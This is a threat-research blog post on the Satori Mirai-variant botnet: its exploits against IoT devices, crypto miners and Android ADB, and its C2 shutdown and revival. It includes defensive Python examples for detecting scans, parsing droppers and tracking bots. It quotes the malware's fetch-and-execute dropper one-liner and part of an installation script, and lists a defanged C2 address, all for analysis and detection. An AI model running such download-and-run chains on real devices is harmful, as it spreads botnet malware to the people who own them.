The Resilient Satori Botnet
The Mirai malware began its life as a weapon in turf wars between feuding video game server operators. In the two years since it debuted, it has seen heavy adoption as a general DDoS attack platform around the world. Although Mirai was not the first malware to be used to perform DDoS attacks on the internet, it has become popular because it provides an approachable and scalable framework for establishing a large botnet of internet-connected devices with potent attack mechanisms. It has been used to orchestrate some of the largest volumetric attacks on record and cause substantive damage. As is often true with malware, modifications and additions to the original products have continued since its release. This is evident today in the many forms of Mirai variants that demonstrate broad changes in how they manage their infrastructure and conduct attacks. One of the more prolific examples of this is the Satori botnet, also known as Mirai Okiru. This botnet has evolved multiple times to include infecting non-Internet of Things (IoT) devices and stealing cryptocurrency, all while continuing to launch DDoS attacks.
In the early days of Mirai, the botnet relied on simple brute force authentication attacks on open Telnet ports to spread. However, newer variants have added specific exploits to increase the variety and number of devices they can attack. Satori is similar to many other Mirai variants in that once a machine is infected with the bot software, it can be used to scan for new victims based upon the exploits it is designed to use.
In late 2017, Satori was infecting IoT devices using specific exploits for port TCP/37215 on Huawei routers (CVE-2017-17215) and port TCP/52869 on Realtek SDK devices (CVE-2014-8361) for the ultimate purpose of performing DDoS attacks. However, there has been a subtle shift away from the typical IoT technologies targeted by Satori in recent months.
In January 2018, researchers noted that Satori was starting to add capabilities to exploit Claymore cryptocurrency miners in addition to the traditional IoT exploits it had used in late 2017. In this attack, an infected Satori bot scans for Claymore cryptocurrency miners on port TCP/3333, which is the management interface. By default, this interface did not have authentication enabled. Once a Claymore mining machine was found, the bot hijacked the miner’s wallet address to point to the Satori operator’s wallet by modifying the miner configuration file, thus stealing the mined currency that the rig produces. The miner machines were not directly infected with the Satori bot malware, so this activity provided only cryptocurrency theft and no increase in the botnet’s size or DDoS power. In May, this behavior continued, with a number of researchers noting that Satori was exploiting cryptominers aggressively. This attack leveraged CVE-2018-1000049 and was very similar in approach to the activity described by researchers in January.
As can be seen below, CenturyLink Threat Research Labs identified a large number of scanners looking for systems with port 3333 open, starting on about May 11:
IPs Scanning for Port TCP/3333
In addition, monitoring traffic with destination port TCP/3333 on our backbone network showed a large spike of total Internet traffic at about 2.2 times previous traffic levels seen during the first five months of the year.
This migration away from traditional IoT targets to other hardware types continued. In July, attack analysis by CenturyLink Threat Research Labs found Satori bots attempting to infect Android devices with Android Debug Bridge (ADB) enabled on port TCP/5555. The ADB service is an Android capability, typically disabled by default, which is used by developers or support personnel to access advanced Android OS features.
The following chart shows a significant traffic spike in July on CenturyLink’s backbone network with destination port TCP/5555. Although we can’t attribute all this traffic to Satori, the increase does coincide with timing of the known Satori attacks.
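The two observations above (many sources fanning out to port TCP/3333, and per-port traffic rising to a multiple of its baseline) are the kind of signal a network operator can pull from ordinary flow records. The following is an added example, not CenturyLink's own tooling: it parses a constructed whitespace-separated flow log (day, source, destination, destination port), flags sources that touched many distinct hosts on the two scan ports named in this post, and computes the window-over-baseline ratio for one port. The log format, addresses and dates are all constructed for the example.

```python
"""Spot Satori-style scanners in a flow log and measure a port's traffic spike.

Added example for this post, not CenturyLink tooling. The log format below is an
assumption; real NetFlow/IPFIX exports would be mapped onto the same Flow tuple.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Set


class Flow(NamedTuple):
    day: str    # YYYY-MM-DD
    src: str
    dst: str
    dport: int


# Ports this post ties to Satori scanning: Claymore management API and Android ADB
SCAN_PORTS = {3333, 5555}

# Constructed sample log (documentation-range addresses, not real telemetry)
SAMPLE_LOG = """\
2018-05-01 198.51.100.8 203.0.113.10 3333
2018-05-02 198.51.100.8 203.0.113.10 3333
2018-05-11 198.51.100.7 203.0.113.1 3333
2018-05-11 198.51.100.7 203.0.113.2 3333
2018-05-11 198.51.100.7 203.0.113.3 3333
2018-05-11 198.51.100.7 203.0.113.4 3333
2018-05-11 198.51.100.7 203.0.113.5 3333
2018-05-11 198.51.100.7 203.0.113.6 3333
2018-07-15 192.0.2.5 203.0.113.20 5555
2018-07-15 192.0.2.5 203.0.113.21 5555
2018-07-15 192.0.2.5 203.0.113.22 5555
2018-07-15 192.0.2.5 203.0.113.23 5555
2018-07-15 192.0.2.5 203.0.113.24 5555
2018-07-15 192.0.2.9 203.0.113.30 443
2018-07-15 192.0.2.9 203.0.113.31 443
2018-07-15 192.0.2.9 203.0.113.32 443
2018-07-15 192.0.2.9 203.0.113.33 443
2018-07-15 192.0.2.9 203.0.113.34 443
"""


def parse_flows(text: str) -> List[Flow]:
    """Parse one flow per line; blank or malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        day, src, dst, dport = parts
        flows.append(Flow(day, src, dst, int(dport)))
    return flows


def find_scanners(flows: Iterable[Flow], min_targets: int = 5) -> Dict[str, Dict[int, int]]:
    """Sources that reached at least min_targets distinct hosts on a scan port.

    Returns {src: {port: distinct_destinations}}. A bot sweeping a range hits many
    hosts on one port; an owner checking a single rig over TCP/3333 does not.
    """
    seen: Dict[str, Dict[int, Set[str]]] = defaultdict(lambda: defaultdict(set))
    for f in flows:
        if f.dport in SCAN_PORTS:
            seen[f.src][f.dport].add(f.dst)
    hits: Dict[str, Dict[int, int]] = {}
    for src, ports in seen.items():
        flagged = {port: len(dsts) for port, dsts in ports.items() if len(dsts) >= min_targets}
        if flagged:
            hits[src] = flagged
    return hits


def spike_ratio(flows: Iterable[Flow], dport: int,
                baseline_days: Set[str], window_days: Set[str]) -> float:
    """Average flows/day to dport inside the window divided by the baseline average.

    This is the shape of figure behind a statement like "2.2 times previous levels".
    Days in a set with no traffic still count toward that set's average.
    """
    flows = list(flows)

    def per_day(days: Set[str]) -> float:
        return sum(1 for f in flows if f.dport == dport and f.day in days) / len(days)

    base = per_day(baseline_days)
    return per_day(window_days) / base if base else float("inf")


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_LOG)
    for src, ports in find_scanners(flows).items():
        print(f"{src}: scanning {ports}")
    print("TCP/3333 spike ratio:",
          spike_ratio(flows, 3333, {"2018-05-01", "2018-05-02"}, {"2018-05-11"}))
```

The threshold of five distinct destinations is deliberately low so the constructed sample triggers; on backbone-scale data it would be raised and combined with the per-port baseline so that a single noisy host does not dominate the ratio.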
The infection process for this attack is described below to give a better understanding of what is happening. Mirai variants such as Satori enter hosts either through weak credentials or exploits and then download lightweight scripts to quickly execute commands on the host to install the full malware payload. Analysis of the steps used on Android devices shows a similar set of commands to what is used on other platforms.
cd /data/local/tmp/; busybox wget http://<MALWAREHOST>/adbs -O -> adbs; sh adbs; curl http://<MALWAREHOST>/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2
Figure 1: Installation Script Download
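For an analyst who captures a command chain like Figure 1 from an ADB session log or honeypot, the useful output is the set of indicators in it: the staging directory, the download hosts, and the file names that are written, executed and then deleted. The parser below is an added example, not code from this post or from the malware. Its sample input mirrors Figure 1 with the placeholder host malware.invalid in place of the real one, and it assumes the stages are joined with semicolons and that payloads land through a shell redirect, as both the wget and curl forms in Figure 1 do.

```python
"""Pull indicators out of a Mirai/Satori-style dropper one-liner.

Added example, not code from the post or from the malware. The sample mirrors
Figure 1 with a placeholder host (malware.invalid) standing in for the real one.
"""
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample modelled on Figure 1; the host is a placeholder, not an indicator
SAMPLE_DROPPER = (
    "cd /data/local/tmp/; busybox wget http://malware.invalid/adbs -O -> adbs; "
    "sh adbs; curl http://malware.invalid/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2"
)


def analyze_dropper(cmdline: str) -> Dict[str, List[str]]:
    """Split the chain on ';' and classify each stage by its first command word."""
    out: Dict[str, List[str]] = {
        "staging_dirs": [], "urls": [], "written": [], "executed": [], "removed": [],
    }
    for stage in cmdline.split(";"):
        tokens = stage.split()
        if not tokens:
            continue
        if tokens[0] == "busybox" and len(tokens) > 1:   # applets are invoked as 'busybox wget'
            tokens = tokens[1:]
        cmd, args = tokens[0], tokens[1:]
        out["urls"].extend(a for a in args if a.startswith(("http://", "https://")))
        if cmd == "cd" and args:
            out["staging_dirs"].append(args[0])
        elif cmd in ("wget", "curl"):
            # Figure 1 lands both payloads via a redirect: '-O -> adbs' and '> adbs2'.
            # Whitespace splitting leaves '->' or '>' as a token; the file follows it.
            for i, a in enumerate(args[:-1]):
                if a.endswith(">"):
                    out["written"].append(args[i + 1])
        elif cmd == "sh" and args:
            out["executed"].append(args[0])
        elif cmd == "rm" and args:
            out["removed"].extend(a for a in args if not a.startswith("-"))
    return out


def download_hosts(summary: Dict[str, List[str]]) -> List[str]:
    """Distinct hosts the dropper fetches from: the values to block or hunt for."""
    hosts = {urlparse(u).hostname for u in summary["urls"]}
    return sorted(h for h in hosts if h)


def suspicious_sequence(summary: Dict[str, List[str]]) -> bool:
    """True when a file is downloaded, executed and removed in the same chain.

    That download-run-delete pattern is the dropper behaviour described above and
    is a reasonable trigger for a detection rule on shell or ADB command logs.
    """
    return bool(set(summary["written"]) & set(summary["executed"]) & set(summary["removed"]))


if __name__ == "__main__":
    summary = analyze_dropper(SAMPLE_DROPPER)
    for key, values in summary.items():
        print(f"{key}: {values}")
    print("download hosts:", download_hosts(summary))
    print("download/run/delete pattern:", suspicious_sequence(summary))
```

Because the parser keys on the command word rather than on any particular host or file name, it also works on the `<MALWAREHOST>` form quoted in Figure 1 and on chains that use only curl or only wget.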
In the more recent Satori dropper samples, the payload grabbed by the dropper is just a shell script that then downloads and attempts to execute bot binaries for a number of various CPU architectures. Given the range of architectures, it would appear that the target is not just Android phones, but also appliances running Android OS.
cp /system/bin/sh .b
busybox wget http://$http_server/$1 -O -> .b
chmod 777 .b
# Uninstall mining software
pm uninstall $1
Satori Malware Installation Script
Following execution of the bot binary, which unsurprisingly begins scanning port TCP/5555 to infect other devices, the script then runs a clean-up process which removes an application under the ID “com.ufo.miner”, as shown above. This is a competing malware installation, a variant of the ADB.Miner cryptocurrency miner known to exploit Android phones. This is followed by cleaning up and removing the installation script from the device. However, the Satori bot malware that was installed is still running on the device.
The targeting of Android devices is a relatively new spin, but the technique used to attack ADB leverages similar methods of operation as previous Mirai variants, and points to the actors heavily reusing earlier code. It also highlights a trend with many actors over the last year in leveraging new exploits to infect additional devices and services that were not targeted previously. As different bot operators compete to recruit devices, it becomes difficult to increase the size of the network beyond a given point without new exploits. Based upon recent history, it should be anticipated that future vulnerabilities will be used in new versions of the malware to allow these operators to grow their capabilities.
For example, researchers at Palo Alto’s Unit 42 recently reported that some Mirai samples have been found to be actively exploiting CVE-2017-5638 (an Apache Struts vulnerability). This exploit could allow the botnet to target devices at enterprises rather than traditional consumer-based IoT devices. In addition, Gafgyt was recently seen to be using an exploit against unpatched versions of SonicWall’s Global Management System (GMS), versions 8.1 and earlier (CVE-2018-9866). Again, this could allow a Gafgyt operator to target new classes of devices, thus increasing the scope of a given botnet.
In late August, CenturyLink Threat Research Labs was monitoring the Satori C2 at 66.42.57[.]45 (domain name 4eouhp79tl5zqs2tbqee[.]ukrainianhorseriding[.]com). This botnet was demonstrating the typical behavior associated with this variant by focusing scanning activity on port TCP/5555 (ADB). On August 30, the number of TCP connections from the bots to the C2 dropped by more than 99 percent, eventually registering zero by September 9. This was just days after the news broke that the actor rumored to be responsible for the Satori botnet was indicted. It was logical to assume that this shift in operation of the botnet was due to the botnet control infrastructure being shut down as a result of this legal action.
However, in mid-September, we started to see indications that the C2 was reactivated. In parallel, the TCP bot traffic to the C2 IP started to increase steadily, indicating that the network was re-activating.
After identifying hosts which were scanning the Internet on port TCP/5555, we could confirm that they were indeed largely from the same infected device pool that existed before the shutdown.
It is interesting to look at the IP space that is connecting to this C2. On September 25, CenturyLink Threat Research Labs monitored approximately 9,900 unique IP addresses making TCP connections to the control port (port TCP/7000) of the C2 IP. The approximate breakdown of countries where the devices making connections to the C2 were located:
In addition, the hosts involved in this botnet were heavily concentrated in a small number of networks, which strongly suggests a high concentration of Android devices. CenturyLink has initiated notifications to these network providers to assist in cleaning up this infection in order to impact the botnet’s ability to operate.
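The C2 monitoring described in the last few paragraphs reduces to a handful of questions about connection records on the control port: how many distinct bots check in each day, how far that count falls after an event like the late-August shutdown, how much of the re-activated population overlaps the pre-shutdown pool, and how the bots distribute across countries and networks. The code below is an added example, not CenturyLink's monitoring code. The C2 address, the connection records and the IP-to-country/network lookup are all constructed; in practice the lookup would come from a GeoIP/ASN database and the records from flow telemetry filtered to the C2's control port (TCP/7000 in this post).

```python
"""Track a C2's bot population over time and where it sits.

Added example, not CenturyLink's monitoring code. Every value below is constructed:
the C2 address is a placeholder, the records use documentation-range IPs, and the
country/network lookup stands in for a GeoIP/ASN database.
"""
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

C2_IP = "192.0.2.200"      # placeholder, not the C2 address from the post
C2_PORT = 7000             # control port named in the post

# Constructed records: (day, bot source IP, destination IP, destination port)
SAMPLE_CONNS: List[Tuple[str, str, str, int]] = [
    ("2018-08-29", "203.0.113.1", C2_IP, C2_PORT),
    ("2018-08-29", "203.0.113.2", C2_IP, C2_PORT),
    ("2018-08-29", "203.0.113.2", C2_IP, C2_PORT),   # repeat connection, same bot
    ("2018-08-29", "203.0.113.3", C2_IP, C2_PORT),
    ("2018-08-29", "203.0.113.4", C2_IP, C2_PORT),
    ("2018-08-29", "203.0.113.5", C2_IP, C2_PORT),
    ("2018-08-29", "203.0.113.6", C2_IP, 80),        # not the control port: ignored
    ("2018-08-30", "203.0.113.1", C2_IP, C2_PORT),   # the drop-off begins
    ("2018-09-25", "203.0.113.1", C2_IP, C2_PORT),   # re-activation
    ("2018-09-25", "203.0.113.2", C2_IP, C2_PORT),
    ("2018-09-25", "203.0.113.3", C2_IP, C2_PORT),
    ("2018-09-25", "203.0.113.7", C2_IP, C2_PORT),   # new recruit
]

COUNTRY, NETWORK = 0, 1
# Constructed lookup: source IP -> (country code, network); AS64496-64498 are documentation ASNs
NETWORK_INFO: Dict[str, Tuple[str, str]] = {
    "203.0.113.1": ("AA", "AS64496"),
    "203.0.113.2": ("AA", "AS64496"),
    "203.0.113.3": ("AA", "AS64496"),
    "203.0.113.4": ("BB", "AS64497"),
    "203.0.113.5": ("CC", "AS64498"),
    "203.0.113.7": ("BB", "AS64497"),
}


def bots_by_day(conns) -> Dict[str, Set[str]]:
    """Unique bot IPs per day that reached the C2 on its control port."""
    days: Dict[str, Set[str]] = defaultdict(set)
    for day, src, dst, dport in conns:
        if dst == C2_IP and dport == C2_PORT:
            days[day].add(src)
    return dict(days)


def daily_counts(conns) -> Dict[str, int]:
    return {day: len(bots) for day, bots in bots_by_day(conns).items()}


def percent_change(counts: Dict[str, int], from_day: str, to_day: str) -> float:
    """Percent change in the bot count between two days; a day with no records counts as zero."""
    before, after = counts.get(from_day, 0), counts.get(to_day, 0)
    if before == 0:
        return float("inf") if after else 0.0
    return (after - before) / before * 100


def returning_share(conns, before_day: str, after_day: str) -> float:
    """Fraction of the later day's bots that were already present on the earlier day.

    A high value says the C2 came back with its old device pool rather than a new one.
    """
    days = bots_by_day(conns)
    before, after = days.get(before_day, set()), days.get(after_day, set())
    return len(before & after) / len(after) if after else 0.0


def breakdown(conns, day: str, field: int) -> Counter:
    """Country (COUNTRY) or network (NETWORK) distribution of that day's bots."""
    bots = bots_by_day(conns).get(day, set())
    return Counter(NETWORK_INFO[ip][field] for ip in bots if ip in NETWORK_INFO)


if __name__ == "__main__":
    counts = daily_counts(SAMPLE_CONNS)
    print("bots per day:", counts)
    print("change 08-29 -> 08-30: %.1f%%" % percent_change(counts, "2018-08-29", "2018-08-30"))
    print("change 08-30 -> 09-09: %.1f%%" % percent_change(counts, "2018-08-30", "2018-09-09"))
    print("returning share on 09-25: %.2f" % returning_share(SAMPLE_CONNS, "2018-08-29", "2018-09-25"))
    print("countries on 09-25:", breakdown(SAMPLE_CONNS, "2018-09-25", COUNTRY))
    print("networks on 09-25:", breakdown(SAMPLE_CONNS, "2018-09-25", NETWORK))
```

The network breakdown is what drives provider notifications: when most of a day's bots sit in one or two networks, those operators are the ones who can clean up the largest share of the infection.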
If there is anything we should take away from the nature and severity of the attacks over the last two years, it is that manufacturers and service providers share a responsibility to ensure that the ecosystem they help create is designed to defend itself. The state of the internet, and the services it provides, are dependent upon an environment where devices are both well managed and capable of being maintained, especially when vulnerabilities are found. Systems must be designed with security in mind and issues must be fixed immediately as they are identified. In addition, default configurations should be set to minimize the vectors that can be used to attack these devices when deployed. Many botnet infections start with simple default passwords or unnecessary open ports to services that the typical user doesn’t require.
Finally, it is interesting that the Satori botnet appears to have survived the arrest of one of its operators. CenturyLink is committed to mitigating these actors over our backbone network, and has deployed mitigations to protect our customers and network from this threat. We welcome support from the broader internet community to assist in these efforts.